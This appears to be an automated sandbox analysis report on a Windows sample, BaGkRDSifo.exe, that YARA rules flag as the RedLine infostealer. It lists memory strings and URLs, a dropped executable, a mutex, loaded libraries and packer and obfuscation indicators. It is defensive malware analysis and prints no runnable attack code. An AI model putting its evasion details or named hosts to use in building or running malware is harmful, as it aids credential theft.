Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/UpLoadOrDownLoadByXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/UpLoadXmlT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/UpdateMeiNianZuTaoT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/UpdatesSetDownT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/UploadStateT
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.adicon.com.cn/ValiUserT

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B33E628 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,		0_2_0B33E628
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B33E61A GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,		0_2_0B33E61A

System Summary

Malicious sample detected (through community Yara rule)

Source: BaGkRDSifo.exe, type: SAMPLE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.0.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\Desktop\STHealthUpdate.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00408C60	0_2_00408C60
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0040DC11	0_2_0040DC11
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00407C3F	0_2_00407C3F
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00418CCC	0_2_00418CCC
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00406CA0	0_2_00406CA0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_004028B0	0_2_004028B0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0041A4BE	0_2_0041A4BE
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00418244	0_2_00418244
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00401650	0_2_00401650
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00402F20	0_2_00402F20
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_004193C4	0_2_004193C4
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00418788	0_2_00418788
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00402F89	0_2_00402F89
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_00402B90	0_2_00402B90
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_004073A0	0_2_004073A0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_024E2A16	0_2_024E2A16
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_024E1023	0_2_024E1023
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_024E1030	0_2_024E1030
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_05A37018	0_2_05A37018
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_05A30007	0_2_05A30007
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_05A30040	0_2_05A30040
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_05A37008	0_2_05A37008
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_05AAD8F4	0_2_05AAD8F4
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_06AD3EE0	0_2_06AD3EE0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_06AD3ED0	0_2_06AD3ED0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_06AD6744	0_2_06AD6744
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_06AD7C90	0_2_06AD7C90
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0A301040	0_2_0A301040
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0A30F6C0	0_2_0A30F6C0
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0A302CB8	0_2_0A302CB8
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0A301D45	0_2_0A301D45
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0A3067E8	0_2_0A3067E8
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0A3067D9	0_2_0A3067D9
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B33839F	0_2_0B33839F
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B337720	0_2_0B337720
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B332790	0_2_0B332790
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B33B480	0_2_0B33B480
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B33B480	0_2_0B33B480
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B337720	0_2_0B337720
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0BB82CD0	0_2_0BB82CD0

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Code function: String function: 0040E1D8 appears 44 times

Source: BaGkRDSifo.exe, 00000000.00000003.1222145293.0000000000972000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclrjit.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003218000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222105370.000000000096D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.00000000036A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSTHealthUpdate.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorlib.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Configuration.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Core.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Xml.dllT vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2483374194.0000000003657000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222174993.000000000098A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000003.1222214639.0000000000995000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs BaGkRDSifo.exe
Source: BaGkRDSifo.exe	Binary or memory string: OriginalFilenameSTHealthClient.exe> vs BaGkRDSifo.exe

Source: BaGkRDSifo.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: BaGkRDSifo.exe, type: SAMPLE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.BaGkRDSifo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Users\user\Desktop\STHealthUpdate.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal80.troj.evad.winEXE@1/2@0/1

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Code function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

0_2_004019F0

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

0_2_004019F0

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

File created: C:\Users\user\Desktop\Update

Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Mutant created: \Sessions\1\BaseNamedObjects\STHealthClient

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Command line argument: 08A

0_2_00413780

Source: BaGkRDSifo.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BaGkRDSifo.exe

Virustotal: Detection: 28%

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: BaGkRDSifo.exe

Static file information: File size 3972096 > 1048576

Source: BaGkRDSifo.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x3a7c00

Source: BaGkRDSifo.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: STHealthClient.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: STHealthClient.pdbx]D source: BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: BaGkRDSifo.exe, 00000000.00000002.2478418643.0000000000968000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777540)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777288)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777263))})
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777540)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777288)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.DdMA3xYEPP0GJ(16777263))})

Source: C:\Users\user\Desktop\BaGkRDSifo.exe

0_2_004019F0

Source: BaGkRDSifo.exe	Static PE information: real checksum: 0x23bfb should be: 0x3cd867
Source: STHealthUpdate.exe.0.dr	Static PE information: real checksum: 0x23bfb should be: 0x3eb3c

Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0040E21D push ecx; ret	0_2_0040E230
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_06ACEAE3 pushfd ; retf	0_2_06ACEAE9
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_06ACEA58 push eax; retf	0_2_06ACEA59
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0A308708 pushad ; retf	0_2_0A308709
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0A300C00 push esp; retn 0004h	0_2_0A300C1C
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B333398 pushad ; iretd	0_2_0B3333A5
Source: C:\Users\user\Desktop\BaGkRDSifo.exe	Code function: 0_2_0B332B9D pushad ; iretd	0_2_0B332B9E

Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'OStA3xMYKIHVl', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 0.2.BaGkRDSifo.exe.2aa1f60.1.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'OStA3xMYKIHVl', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
